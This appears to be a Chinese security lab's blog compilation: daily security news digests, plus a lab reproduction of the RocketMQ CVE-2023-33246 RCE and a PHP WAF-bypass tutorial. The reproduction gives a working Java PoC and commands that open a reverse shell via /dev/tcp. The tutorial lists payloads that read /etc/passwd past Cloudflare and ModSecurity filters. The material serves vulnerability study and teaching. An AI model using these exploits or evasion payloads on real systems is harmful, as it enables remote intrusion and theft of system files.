网络安全日报 2023年06月20日
1、西部数据将过时的NAS设备从My Cloud中移除 https://www.westerndigital.com/support/product-security/wdc-23009-western-digital-my-cloud-os-5-my-cloud-home-and-sandisk-ibi-firmware-update 西部数据(Western Digital)是一家知名的存储设备制造商,其旗下的My Cloud是一种个人云存储解决方案,可以让用户在家庭或办公室中保存和共享数据。然而,近日西部数据宣布,将从2023年6月30日起停止对部分旧款NAS设备的支持,并将它们从My Cloud服务中移除。这些设备包括My Cloud、M 2、SMS传送报告可被用于推断收件人的位置 https://arxiv.org/pdf/2306.07695.pdf SMS传送报告(SMS delivery report)是一种由移动网络发送的通知,用于确认短信是否成功送达到目标收件人。SMS传送报告包含了一些有关短信发送和接收的信息,例如发送时间、送达时间、送达状态等。然而,近日有研究人员发现,短信送达报告也可以被用于推断收件人的位置。这是因为不同的移动网络运营商在处理短信送达报告时,会使用不同的时间戳格式。例如,有些运营商会使用秒级的时间戳,而有些运营商会使用毫秒级的时间戳。这样,通过比较发送时间和送达时间的差异,就可以推测出收件人所在的时区。此外,有些运营商还会在短信送达报告 3、Reddit遭黑客窃取80GB数据并被勒索赎金 https://www.reddit.com/r/reddit/comments/10y427y/we_had_a_security_incident_heres_what_we_know/?onetap_auto=true Reddit是一个社交新闻聚合网站,拥有数亿用户。今年2月,Reddit遭到了一场网络攻击,黑客利用了一个未公开的漏洞,入侵了Reddit的服务器,窃取了约80GB的数据,包括用户信息、私信、评论、帖子等。黑客自称是BlackCat/ALPHV勒索软件团伙,他们在暗网上发布了部分数据的截图,要求Reddit支付1000比特币(约合4000万美元)的赎金,否则就会公开全部 4、CISA和NSA发布服务器管理控制器加固指南 https://media.defense.gov/2023/Jun/14/2003241405/-1/-1/0/CSI_HARDEN_BMCS.PDF CISA(美国网络安全与基础设施安全局)和NSA(美国国家安全局)于2023年6月14日联合发布了一份网络安全信息表(CSI),重点介绍了服务器管理控制器(BMC)实现的威胁,并详细说明了组织可以采用的加固措施。BMC是嵌入在计算机硬件中的重要组件,可以实现远程管理和控制。它们独立于操作系统和固件运行,即使系统关闭也可以保证无缝控制。然而,由于它们具有高权限级别和网络可访问性,这些设备使它们成为恶意行为者的有吸引力的目标。CISA和NSA强 5、Windows Sysmon本地提权漏洞的PoC公开 https://securityonline.info/poc-released-for-windows-sysinternals-sysmon-privilege-escalation-cve-2023-29343-bug/ Windows Sysmon是一个系统服务和设备驱动程序,可以监控和记录系统活动到Windows事件日志。2023年5月9日,微软披露了一个影响Sysmon的本地提权漏洞,编号为CVE-2023-29343,该漏洞可以让已认证的攻击者获取SYSTEM权限,这是Windows环境中最高级别的权限。这个漏洞的原因在于Sysmon验证其归档目录的访问和所有权的方式。微软已经 6、Rhysida 勒索软件泄露了从智利军队窃取的文件 https://www.bleepingcomputer.com/news/security/rhysida-ransomware-leaks-documents-stolen-from-chilean-army/ 最近浮出水面的名为 Rhysida 的勒索软件行动背后的威胁参与者已经在网上泄露了他们声称是从智利军队 (Ejército de Chile) 网络中窃取的文件。 7、MOVEit Transfer 客户警告 PoC 信息出现新缺陷 https://www.bleepingcomputer.com/news/security/moveit-transfer-customers-warned-of-new-flaw-as-poc-info-surfaces/ 在今天在线共享有关新 SQL 注入 (SQLi) 漏洞的信息后,Progress 警告 MOVEit Transfer 客户限制对其环境的所有 HTTP 访问。 8、勒索软件黑客和骗子利用云挖矿洗钱 https://thehackernews.com/2023/06/ransomware-hackers-and-scammers.html 来新发现显示,勒索软件参与者和加密货币诈骗者已与民族国家参与者一起滥用云挖矿服务来清洗数字资产。 9、统一全球网络安全设备的测评方法!网络安全标准化将迎来重大进展 https://www.secrss.com/articles/55710 行业组织NetSecOpen最近发布了新版网络安全设备性能基准测试指南草案,预计将在今年晚些时候正式采纳。NetSecOpen是一家由众多网络安全公司和硬件测试组织组成的行业联合会。 10、华硕修补了 9个WiFi 路由器的严重漏洞 https://www.securityweek.com/asus-patches-highly-critical-wifi-router-flaws/ 华硕修补了 9 个 WiFi 路由器安全缺陷,包括 2018 年的一个非常严重的漏洞,该漏洞使用户面临代码执行攻击。 免责声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
网络安全日报 2023年06月19日
1、供应链攻击者利用S3桶劫持技术投毒NPM包 https://checkmarx.com/blog/hijacking-s3-buckets-new-attack-technique-exploited-in-the-wild-by-supply-chain-attackers/? S3桶是一种由亚马逊网络服务(AWS)提供的存储资源,允许用户通过互联网存储和检索大量数据。它是一种可扩展、安全的对象存储服务,可以存储文件、文档、图像、视频和任何其他类型的数字内容。S3桶可以使用唯一的URL访问,因此被广泛用于各种目的,如网站托管、数据备份和归档、内容分发和应用程序数据存储。近日,一种新的攻击技术被发现在野外被供应链攻击者利用。攻击者在不 2、GravityRAT恶意软件可窃取Android设备上的WhatsApp备份 https://www.welivesecurity.com/2023/06/15/android-gravityrat-goes-after-whatsapp-backups/ GravityRAT是一种跨平台的远程访问木马,可以针对Windows、Android和macOS设备。该恶意软件被认为是由巴基斯坦的网络间谍组织SpaceCobra开发和使用的,主要针对印度的军事人员。最近,研究人员发现了一个新版本的Android GravityRAT恶意软件,伪装成消息应用BingeChat和Chatico.这个新版本的GravityRAT具有两个新的功能:可以窃取WhatsApp备份文件,并 3、美国逮捕涉嫌参与LockBit勒索软件的俄罗斯人 https://www.justice.gov/d9/2023-06/astamirov.complaint.pdf LockBit是一种勒索软件,可以加密受害者的数据,并要求支付赎金以恢复访问。该软件采用勒索软件即服务(RaaS)的模式,由一个核心团队招募附属成员来执行攻击,并从赎金中分成。LockBit自2019年底出现以来,已经对美国和其他国家的数千个组织发动了攻击,涉及政府、医疗、教育、法律、制造等多个行业。美国司法部(DoJ)于2023年6月16日宣布,已经逮捕并起诉一名俄罗斯公民,Ruslan Magomedovich Astamirov,指控他参与了LockBit勒索软件的活动 4、智利军队遭遇新兴勒索软件Rhysida的攻击 https://www.cronup.com/ejercito-de-chile-es-atacado-por-la-nueva-banda-de-ransomware-rhysida/ Rhysida是一种新兴的勒索软件,可以加密受害者的数据,并要求支付赎金以恢复访问。该软件由一个未知的犯罪团伙开发和使用,自2023年5月以来已经对多个组织发动了攻击,涉及教育、医疗、政府等多个行业。2023年5月27日,智利军队遭遇了Rhysida勒索软件的攻击,影响了其内部网络的多个系统。军方在两天后确认了这一事件,并采取了应急措施,如禁止开启计算机、断开网络连接、备份数据等,以防止进一步的损失。智利政 5、美国联邦调查局加强打击非法DDoS攻击 https://www.fbi.gov/contact-us/field-offices/anchorage/fbi-intensify-efforts-to-combat-illegal-ddos-attacks 美国联邦调查局(FBI)和国际执法机构加强了打击非法分布式拒绝服务(DDoS)攻击的努力。DDoS攻击是一种网络犯罪,通过向目标服务器或网络资源发送大量无用的请求,使其无法为合法用户提供服务。DDoS攻击有两种形式:一种是使用自己控制的恶意软件感染的计算机网络(即僵尸网络)发起攻击,另一种是通过付费购买所谓的“Booter”或“Stresser”服务,利用已存在的感染网络发起攻击 6、印度制药巨头Granules遭LockBit勒索软件攻击 https://techcrunch.com/2023/06/15/lockbit-ransomware-granules-india/ 印度制药巨头Granules India近日遭到了与俄罗斯有关的勒索软件团伙LockBit的网络攻击,部分数据被窃取并公开在暗网上。LockBit在其泄露网站上于周三将Granules India列为其最新的受害者之一。Granules India尚未证实这次勒索软件攻击。然而,该公司上个月向印度证券交易所披露了一起网络安全事件,并表示已经隔离了受影响的IT资产。Granules India成立于1984年,是印度最大的制药生产商之一。总部位于海得拉巴的该 7、MOVEit Transfer和MOVEit Cloud存在严重漏洞 https://www.progress.com/security/moveit-transfer-and-moveit-cloud-vulnerability MOVEit Transfer和MOVEit Cloud是Progress Software公司提供的文件传输系统,广泛应用于公共部门和企业。然而,这两个系统存在一个严重的漏洞(CVE-2023-34362),可能导致权限提升和潜在的未经授权的访问。该漏洞于2023年5月被Progress公司披露,并在48小时内发布了调查结果、缓解措施和安全补丁。但是,该漏洞仍被一些黑客利用,用于窃取客户的数据或部署勒索软件。根据Checkpoin 8、黑客假冒LetsVPN网站传播银行木马 https://blog.cyble.com/2023/06/16/new-malware-campaign-targets-letsvpn-users/ 研究人员发现了一个新的恶意软件活动,利用假冒的LetsVPN网站来传播多种恶意软件。 LetsVPN是一款由LetsGo Network开发的VPN应用程序,旨在提供高速和安全的网络连接。研究人员在进行常规的威胁狩猎时,发现了多个伪造的LetsVPN网站,这些网站与真正的LetsVPN网站在设计和外观上非常相似,但实际上是用来分发恶意软件的。这些恶意软件包括BlackMoon、AgentTesla、Formbook等银行木马,它们都是伪装 9、美国政府悬赏1000万美元缉拿Clop勒索软件幕后人员 https://www.bleepingcomputer.com/news/security/us-govt-offers-10-million-bounty-for-info-on-clop-ransomware/ 美国国务院的“正义奖励”计划近日宣布,将为提供与外国政府有关的Clop勒索软件攻击的信息提供高达1000万美元的奖金。Clop是一个活跃的勒索软件团伙,曾被指与俄罗斯有关联。该团伙曾袭击过多个高调目标,包括美国大型肉类加工商JBS、韩国电子巨头LG、德国软件公司Software AG、法国零售商E.Leclerc等。Clop还涉嫌与FIN11网络犯罪集团合作,后者是一个以网络钓 10、微软发布对DDoS服务攻击的应对策略和建议 https://msrc.microsoft.com/blog/2023/06/microsoft-response-to-layer-7-distributed-denial-of-service-ddos-attacks/ 微软安全响应中心(MSRC)发布了一篇博客文章,介绍了微软对第七层分布式拒绝服务(DDoS)攻击的应对策略和建议。第七层DDoS攻击是指针对应用程序层的攻击,如HTTP、HTTPS、DNS等,目的是消耗目标服务器的资源或影响其功能。微软表示,近期发现了一些针对其云服务和在线服务的第七层DDoS攻击,其中一些攻击使用了复杂的技术,如HTTP/2协议、TLS 1.3加密、 免责声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
CVE-2023-33246命令执行复现分析
RocketMQ是一款低延迟、高并发、高可用、高可靠的分布式消息中间件。既可为分布式应用系统提供异步解耦和削峰填谷的能力,同时也具备互联网应用所需的海量消息堆积、高吞吐、可靠重试等特性。 影响版本 <=RocketMQ 5.1.0 <=RocketMQ 4.9.5 环境搭建 docker pull apache/rocketmq:4.9.4 root@ubuntu:/home/ubuntu/Desktop# docker run -d --name rmqnamesrv -p 9876:9876 apache/rocketmq:4.9.4 sh mqnamesrv     //起nameserver 创建broker.conf,并且修改配置文件内容 root@ubuntu:/home/ubuntu/Desktop# docker run -d --name rmqbroker --link rmqnamesrv:namesrv -e "NAMESRV_ADDR=namesrv:9876" -p 10909:10909 -p 10911:10911 -p 10912:10912 apache/rocketmq:4.9.4 sh mqbroker -c /home/rocketmq/rocketmq-4.9.4/conf/broker.conf   //起Broker docker ps http://127.0.0.1:10912/python3 check.py --ip 10.10.14.72 --port 9876 python3 CVE-2023-33246_RocketMQ_RCE_EXPLOIT.py 10.10.14.72 10911 wget  10.10.14.162:8666/1.txt 使用vulhub直接搭建可能效果好一点儿,否则,不知道为什么在漏洞利用执行上面命令的时候无回显,可能exp的问题 cd vulhub/rocketmq/CVE-2023-33246 docker-compose up -d POC如下 import org.apache.rocketmq.tools.admin.DefaultMQAdminExt; import java.util.Base64; import java.util.Properties; public class poc {    private static String getCmd(String ip, String port) {        String cmd = "bash -i >& /dev/tcp/" + ip + "/" + port + " 0>&1";        String cmdBase = Base64.getEncoder().encodeToString(cmd.getBytes());        return "-c $@|sh . echo echo \"" + cmdBase + "\"|base64 -d|bash -i;";   }    public static void main(String[] args) throws Exception {        String targetHost = "目的IP";        String targetPort = "10911";            String shellHost = "VPSIP";        String shellPort = "Listen-port";            String targetAddr = String.format("%s:%s",targetHost,targetPort);        Properties props = new Properties();        props.setProperty("rocketmqHome", getCmd(shellHost,shellPort));        props.setProperty("filterServerNums", "1");        // 创建 DefaultMQAdminExt 对象并启动        DefaultMQAdminExt admin = new DefaultMQAdminExt(); //       admin.setNamesrvAddr("0.0.0.0:12345");        admin.start();        // 更新配置⽂件        admin.updateBrokerConfig(targetAddr, props);        Properties brokerConfig = admin.getBrokerConfig(targetAddr);        System.out.println(brokerConfig.getProperty("rocketmqHome"));        System.out.println(brokerConfig.getProperty("filterServerNums"));        // 关闭 DefaultMQAdminExt 对象        admin.shutdown();   } } 使用IDEA创建maven项目,创建xml文件下载依赖,下载地址 https://mvnrepository.com/artifact/org.apache.rocketmq/rocketmq-tools/4.9.4<!-- https://mvnrepository.com/artifact/org.apache.rocketmq/rocketmq-tools --> <dependency>    <groupId>org.apache.rocketmq</groupId>    <artifactId>rocketmq-tools</artifactId>    <version>4.9.4</version> </dependency> 修改POC import org.apache.rocketmq.tools.admin.DefaultMQAdminExt; import java.util.Base64; import java.util.Properties; public class poc {    private static String getCmd(String ip, String port) {        String cmd = "bash -i >& /dev/tcp/" + ip + "/" + port + " 0>&1";        String cmdBase = Base64.getEncoder().encodeToString(cmd.getBytes());        return "-c $@|sh . echo echo \"" + cmdBase + "\"|base64 -d|bash -i;";   }    public static void main(String[] args) throws Exception {        String targetHost = "10.10.14.72";        String targetPort = "10911";            String shellHost = "10.10.14.72";        String shellPort = "65532";            String targetAddr = String.format("%s:%s",targetHost,targetPort);        Properties props = new Properties();        props.setProperty("rocketmqHome", getCmd(shellHost,shellPort));        props.setProperty("filterServerNums", "1");        // 创建 DefaultMQAdminExt 对象并启动        DefaultMQAdminExt admin = new DefaultMQAdminExt(); //       admin.setNamesrvAddr("0.0.0.0:12345");        admin.start();        // 更新配置⽂件        admin.updateBrokerConfig(targetAddr, props);        Properties brokerConfig = admin.getBrokerConfig(targetAddr);        System.out.println(brokerConfig.getProperty("rocketmqHome"));        System.out.println(brokerConfig.getProperty("filterServerNums"));        // 关闭 DefaultMQAdminExt 对象        admin.shutdown();   } } 反弹结果 git clone https://github.com/SuperZero/CVE-2023-33246.git java -jar CVE-2023-33246.jar -ip "127.0.0.1:10911" -cmd "222 >/root/2.txt" 进入容器,查看根部录下文件是已写入 java -jar CVE-2023-33246.jar -ip "127.0.0.1:10911" -cmd "bash -i >& /dev/tcp/10.10.14.72/65532 0>&1" 反弹shell 漏洞分析 启动broker路由如下: main:50, BrokerStartup (org.apache.rocketmq.broker) start:55, BrokerStartup (org.apache.rocketmq.broker) start:1570, BrokerController (org.apache.rocketmq.broker) startBasicService:1527, BrokerController (org.apache.rocketmq.broker) start:57, FilterServerManager (org.apache.rocketmq.broker.filtersrv) 当在函数org.apache.rocketmq.broker.filtersrv.FilterServerManager61行 调用下面的createFilterServer方法,71行中看到从配置文件中获取参数。72行调用方法buildStartCommand 该方法中取到变量NamesrvAddr和 RocketmqHome,获取之后进行拼接cmd,在72行拿到拼接后的cmd 进入for循环后在org.apache.rocketmq.broker.filtersrv.FilterServerUtil中给的callshell方法去执行命令 该中间件本来就是每30秒执行一次,漏洞产生的就是修改了配置文件,变量被赋值为了恶意命令,导致了命令执行。
网络安全日报 2023年06月16日
1、Azure 中的 XSS 漏洞导致未经授权访问用户会话 https://www.securityweek.com/xss-vulnerabilities-in-azure-led-to-unauthorized-access-to-user-sessions/Microsoft 解决了 Azure Bastion 和 Azure 容器注册表 (ACR) 中的两个跨站点脚本 (XSS) 漏洞,可导致未经授权访问用户会话。 2、Vidar 恶意软件使用新策略来逃避检测和匿名化活动 https://thehackernews.com/2023/06/vidar-malware-using-new-tactics-to.htmlVidar 恶意软件背后的威胁行为者已经对其后端基础设施进行了更改,表明他们试图重组和隐藏他们的在线踪迹,以响应对其作案手法的公开披露。 3、GravityRAT Android 木马窃取 WhatsApp 备份和删除文件 https://thehackernews.com/2023/06/warning-gravityrat-android-trojan.html自 2022 年 6 月以来,一个名为GravityRAT的 Android 远程访问木马的更新版本被发现伪装成消息传递应用程序 BingeChat 和 Chatico,ESET 研究员 Lukáš Štefanko在发布的一份新报告中说:“在新发现的活动中值得注意的是,GravityRAT 可以泄露 WhatsApp 备份并接收删除文件的命令。 4、新的供应链攻击利用废弃的 S3 存储桶分发恶意二进制文件 https://thehackernews.com/2023/06/new-supply-chain-attack-exploits.html在针对开源项目的新型软件供应链攻击中,威胁行为者可以控制过期的 Amazon S3 存储桶来为流氓二进制文件提供服务,而无需更改模块本身。 5、微软揭露俄罗斯军方新型黑客组织Cadet Blizzard https://www.microsoft.com/en-us/security/blog/2023/06/14/cadet-blizzard-emerges-as-a-novel-and-distinct-russian-threat-actor/微软近日追踪到一波来自俄罗斯军事情报总局(GRU)下属的黑客组织“Cadet Blizzard”的网络攻击。这些攻击从2023年2月开始,针对乌克兰的政府机构和IT服务提供商。微软还将2022年1月俄罗斯入侵乌克兰前对乌克兰发动的破坏性“WhisperGate”擦除攻击归咎于“Cadet Blizzard”。“Cadet Blizzard”通常通过 6、美国、加拿大和其他五国网络安全机构联合发布 LockBit 勒索软件报告 https://securityaffairs.com/147482/cyber-crime/lockbit-ransomware-advisory.html美国、加拿大和其他五个国家的网络安全机构在周三发布了一份联合警告,指出以“LockBit”为旗号的数字勒索团伙是全球最大的勒索软件威胁。LockBit勒索软件是一种恶意软件,用于加密受害者的数据,直到支付赎金为止。根据警告,LockBit是网络犯罪分子最广泛使用的勒索软件之一。“2022年,LockBit是全球部署最多的勒索软件变体,并且在2023年仍然很活跃。”警告说,“LockBit及其附属组织已经对全球各地的大大小小的组织造成了负面 7、黑客利用云挖矿平台分发Roamer银行木马 https://blog.cyble.com/2023/06/14/cloud-mining-scam-distributes-roamer-banking-trojan/研究人员揭露了一种云挖矿诈骗,利用网络钓鱼来分发Roamer银行木马,目标是Android平台的加密货币钱包和银行应用,旨在窃取敏感信息。Roamer银行木马是一种恶意软件,利用辅助功能服务来执行恶意操作。一旦安装,该恶意软件请求用户启用辅助功能服务,一旦授予,它就会滥用该服务来提取加密货币钱包和银行应用中的敏感信息,如账户余额、货币类型、交易金额和收款人信息。该恶意软件通过网络钓鱼网站来诱骗用户下载一个名为“CloudMi 8、在多个 HP 多功能一体机产品中检测到严重漏洞,补丁已发布 https://thecyberexpress.com/critical-hp-printer-vulnerability-patch/HP 打印机漏洞影响了多个型号,可能导致缓冲区溢出和远程代码执行。HP LaserJet MFP 漏洞的严重性评分为 9.8,被认为是高度严重的漏洞。 9、Windows和MacOS平台上发现多个Zoom漏洞,已发布补丁 https://thecyberexpress.com/zoom-vulnerabilities-windows-macos-patched/最新的Zoom漏洞列表已经出来了,其中几个漏洞的严重程度非常高。此次发布的补丁针对六个漏洞。 10、虚假研究人员通过 GitHub 存储库发布PoC传播恶意软件 https://thehackernews.com/2023/06/fake-researcher-profiles-spread-malware.html观察到与欺诈性网络安全公司相关的虚假研究人员的十几个GitHub帐户中至少有一半在代码托管服务上推送恶意存储库。 免责声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
网络安全日报 2023年06月15日
1、盗版ISO文件通过EFI分区安装剪贴板恶意软件 https://news.drweb.com/show/?i=14712&lng=en& 近日,研究人员发现黑客通过种子分发Windows 10,将加密货币劫持器隐藏在EFI(可扩展固件接口)分区中,以逃避检测。EFI分区是一个小的系统分区,包含了在操作系统启动之前执行的引导加载程序和相关文件。它对于使用UEFI替代了过时的BIOS的系统是必不可少的。之前有过利用修改过的EFI分区来从操作系统的上下文之外激活恶意软件的攻击,例如BlackLotus。但是,研究人员发现的盗版Windows 10 ISO文件只是使用EFI作为剪贴板组件的安全存储空间。由于标准的杀毒工具通常不会扫描EFI分区,恶 2、仿冒WannaCry的勒索软件攻击俄罗斯游戏社区 https://blog.cyble.com/2023/06/13/threat-actor-targets-russian-gaming-community-with-wannacry-imitator/ 威胁行为者使用了一种仿冒WannaCry的勒索软件,针对俄罗斯的游戏社区进行了攻击。该勒索软件利用了EternalBlue漏洞,通过SMBv1协议在网络中传播。受害者的文件被加密,并显示了一个类似于WannaCry的勒索信息,要求支付0.1个比特币(约合4000美元)来解密文件。研究人员发现,该勒索软件并没有真正使用WannaCry的代码,而是使用了一个开源的加密工具来模仿WannaCr 3、Sygnia揭露了一场全球性的网络钓鱼活动 https://blog.sygnia.co/cracking-global-phishing-campaign-using-threat-intelligence-toolkit B根据Sygnia的博客,该公司的威胁情报团队发现并追踪了一场全球性的网络钓鱼活动,该活动针对多个行业和地区的组织,试图窃取用户的凭证和敏感数据。该活动使用了多种技术手段,包括域名欺骗、邮件伪造、网站克隆、SSL证书伪造等,来模仿合法的组织和服务,诱使用户点击恶意链接或附件。该活动还利用了一些合法的在线服务,如Google Forms、SurveyMonkey、Mailchimp等,来隐藏其恶意行为。Sygnia 4、Edge浏览器功能会将你浏览的图片发送回微软 https://www.malwarebytes.com/blog/news/2023/06/edge-browser-feature-sends-images-you-view-back-to-microsoft 根据研究人员的博客,微软Edge浏览器有一个名为“图片搜索”的功能,可以让用户在浏览网页时,右键点击任意图片,然后选择“在Bing中搜索此图片”,从而在Bing搜索引擎中找到该图片的相关信息。然而,这个功能也会将用户浏览的图片发送回微软的服务器,可能会导致用户的隐私泄露。研究人员发现,当用户使用这个功能时,Edge浏览器会将图片的URL和内容以及用户的IP地址和设备信息发送给微软 5、WooCommerce Stripe 插件严重漏洞影响数十万个电子商务网站 https://www.securityweek.com/hundreds-of-thousands-of-ecommerce-sites-impacted-by-critical-plugin-vulnerability/ WooCommerce Stripe 支付网关插件中的一个严重漏洞影响了数十万个电子商务网站。 6、Chrome 114 更新修补了严重漏洞 https://www.securityweek.com/chrome-114-update-patches-critical-vulnerability/ 谷歌发布了 Chrome 114 安全更新,以解决五个漏洞,包括自动填充支付中的一个严重漏洞。 7、Spotify 因违反欧盟数据规则被罚款 500 万美元 https://www.securityweek.com/spotify-fined-5-million-for-breaching-eu-data-rules/ 瑞典当局表示,音乐流媒体巨头 Spotify 被罚款 5800 万瑞典克朗(540 万美元),原因是未正确告知用户其收集的用户数据的使用方式。 8、门禁巨头遭勒索攻击,北约、阿里集团等多个实体受到影响 https://www.freebuf.com/news/369451.html Cyber News 网站披露,疑似与俄罗斯有关的勒索软件团伙 ALPV/BlackCat 袭击了安全门禁制造商Automatic Systems,北约、阿里巴巴、泰雷兹等多个实体组织可能受到影响。 9、苹果将在 iOS 17 引入新功能,Safari隐私浏览有重大更新 https://thehackernews.com/2023/06/apples-safari-private-browsing-now.html 苹果将在 iOS 17 引入新功能,Safari隐私浏览有重大更新。预计它们将在今年晚些时候在 iOS 17、iPadOS 17和macOS Sonoma上向用户推出。 10、中国网络空间安全协会发布《“在线影音类”App个人信息收集测试报告》 https://www.secrss.com/articles/55553 测试发现,腾讯视频、爱奇艺等8款App在5种场景下调用了位置、设备信息、应用列表、剪切板、存储5类系统权限,未发现调用相机、麦克风、通讯录等其他权限。 免责声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
利用 PHP 特性绕 WAF 测试
在测试绕过 WAF 执行远程代码之前,首先构造一个简单的、易受攻击的远程代码执行脚本,内容如图: 第 6 行是一个比较明显的命令执行代码,第 3 行尝试拦截 system、exec 或 passthru 等函数(PHP 中有许多其他函数可以执行系统命令,这三个是最常见的)。 这个脚本部署在 Cloudflare WAF 和 ModSecurity + OWASP CRS3 之后。对于第一个测试,尝试读取 passwd 的内容; /cfwaf.php?code=system("cat /etc/passwd"); 可以看到,被 CloudFlare 拦截了,我们可以尝试使用未初始化变量的方式绕过,比如: cat /etc$u/passwd Cloudflare WAF 已被绕过,但是由于脚本检查敏感函数,所以被脚本拦截,那么如何绕过脚本的函数检测呢?我们看看关于字符串的 PHP 文档: https://secure.php.net/manual/en/language.types.string.phpPHP 字符串转义序列: [0–7]{1,3} 八进制表示法的字符序列,它会自动溢出以适应一个字节(例如“\400”===“\000”) \x[0–9A-Fa-f]{1,2} 十六进制字符序列(例如“\x41”) \u{[0–9A-Fa-f]+} Unicode 代码点序列,将作为该代码点的 UTF-8 表示输出到字符串(在 PHP 7.0.0 中添加) 不是每个人都知道 PHP 表示字符串的语法,而“PHP 变量函数”则成为我们绕过过滤器和规则的瑞士军刀。 PHP变量函数 PHP 支持变量函数的概念。这意味着如果变量名后面附加了圆括号,PHP 将寻找与变量求值结果同名的函数,并尝试执行它。除其他事项外,这可用于实现回调、函数表等。 这意味着语法如 $var(args); 和 "sting"(args; 等于 func(args); 。如果我可以通过使用变量或字符串来调用函数,则意味着我可以使用转义序列而不是函数名。这里有一个例子: 第三种语法是十六进制符号的转义字符序列,PHP 将其转换为字符串“system”,然后使用参数“ls”转换为函数系统。让我们尝试使用易受攻击的脚本: 此技术不适用于所有 PHP 函数,变量函数不适用于 echo、print、unset()、isset()、empty()、include、require 。利用包装函数将这些构造中的任何一个用作变量函数。 改进用户输入检测 如果我从易受攻击脚本的用户输入中排除双引号和单引号等字符,会发生什么情况?即使不使用双引号也可以绕过它吗?让我们试试: 正如您在第三行看到的,现在脚本阻止在 $_GET[code] 查询字符串参数中使用“和”。我以前的有效负载现在应该被阻止: 幸运的是,在 PHP 中,我们并不总是需要引号来表示字符串。PHP 使您能够声明元素的类型,例如 $a = (string)foo; 在这种情况下,$a 包含字符串“foo”。此外,圆括号内没有特定类型声明的任何内容都被视为字符串: 在这种情况下,我们有两种方法可以绕过新过滤器:第一种是使用类似 (system)(ls) 的方法;但是我们不能在代码参数中使用“system”,所以我们可以像 (sy.(st).em)(ls); 一样连接字符串。第二种是使用 $GET 变量。如果我发送像 ?a=system&b=ls&code=$GETa 这样的请求;结果是:$GET[a] 将替换为字符串“system”,$GET[b] 将替换为字符串“ls”,我将能够绕过所有过滤器! 让我们尝试使用第一个有效负载 (sy.(st).em)(whoami); 和第二个有效载荷 ? ?a=system&b=cat+/etc&c=/passwd&code=$\_GET[a]($\_GET[b].$\_GET[c]); 在这种情况下,没有用,但您甚至可以在函数名称和参数内部插入注释(这可能有助于绕过阻止特定 PHP 函数名称的 WAF 规则集)。以下所有语法均有效: get_defined_functions 函数 此 PHP 函数返回一个多维数组,其中包含所有已定义函数的列表,包括内置(内部)函数和用户定义函数。内部函数可以通过 $arr[“internal”] 访问,用户定义的函数可以使用 $arr[“user”] 访问。例如: 这可能是另一种无需使用其名称即可访问系统功能的方法。如果我对“系统”进行 grep,我可以发现它的索引号并将其用作我的代码执行的字符串: 显然,这应该对我们的 Cloudflare WAF 和脚本过滤器有效: 字符数组 PHP 中的每个字符串都可以用作字符数组(几乎像 Python 那样),您可以使用语法 $string[2] 或 $string[-3] 引用单个字符串字符。这可能是另一种规避阻止 PHP 函数名称的规则的方法。例如,使用这个字符串 $a=”elmsty/ “; 我可以编写语法系统(“ls /tmp”); 如果幸运的话,您可以在脚本文件名中找到所需的所有字符。使用相同的技术,您可以使用类似的方法选择所需的所有字符 OWASP CRS3 有了 OWASP CRS3,一切都变得更难了。首先,使用之前看到的技术,我只能绕过第一个偏执级别,这太神奇了!因为 Paranoia Level 1 只是我们可以在 CRS3 中找到的规则的一小部分,所以这个级别旨在防止任何误报。对于 2 级偏执狂,由于规则 942430“受限 SQL 字符异常检测(args):超出特殊字符数”,所有事情都变得困难。我能做的只是执行一个不带参数的命令,如“ls”、“whoami”等。但我无法像使用 Cloudflare WAF 那样执行类似 system(“cat /etc/passwd”) 的命令:
网络安全日报 2023年06月14日
1、瑞士政府遭受勒索软件和DDoS攻击的双重打击 https://www.admin.ch/gov/en/start/documentation/media-releases.msg-id-95641.html 瑞士政府近日披露,其IT供应商Xplain遭到了Play勒索软件团伙的攻击,可能导致政府数据泄露。同时,瑞士政府还警告称,其多个网站和在线服务正面临着来自NoName黑客组织的DDoS(分布式拒绝服务)攻击。这两起事件反映了组织和政府在利用第三方服务托管数据和公开提供在线服务时所面临的复杂威胁。据报道,Play勒索软件团伙于2023年5月23日入侵了Xplain,这是一家为瑞士各个政府部门、行政单位甚至军队提供软件解决方案的技术提供 2、Zacks遭遇数据泄露影响880万用户 https://www.bleepingcomputer.com/news/security/have-i-been-pwned-warns-of-new-zacks-data-breach-impacting-8-million/ 据报道,Zacks遭遇了一起较早的、此前未披露的数据泄露事件,影响了880万客户,该数据库现已在黑客论坛上分享。该公司此前曾披露过一起发生在2021年11月至2022年8月期间的数据泄露事件,警告称未经授权的网络入侵者“访问”了约82万客户的个人敏感信息,但Zacks当时声称没有理由相信任何客户信用卡信息、任何其他客户财务信息或任何其他客户个人信息被访问。然而, 3、研究人员分享一种高级的批处理文件混淆技术 https://www.trendmicro.com/en_us/research/23/f/analyzing-the-fud-malware-obfuscation-engine-batcloak.html BatCloak引擎是一种用于混淆批处理文件的高级技术,可以使恶意批处理文件完全无法检测(FUD),并能够无缝地加载各种恶意软件家族和利用。研究人员在近期的调查中发现,BatCloak引擎被广泛地集成到现代恶意软件中,例如SeroXen远程访问木马(RAT),并具有显著的安全逃避能力。BatCloak引擎的核心是一个名为BatCloak.exe的可执行文件,它可以接受一个批处理文件作 4、Forta软件漏洞导致医疗供应商数据泄露 https://apps.web.maine.gov/online/aeviewer/ME/40/cd6cca3b-8ef7-40fd-8814-d0688c72716a.shtml 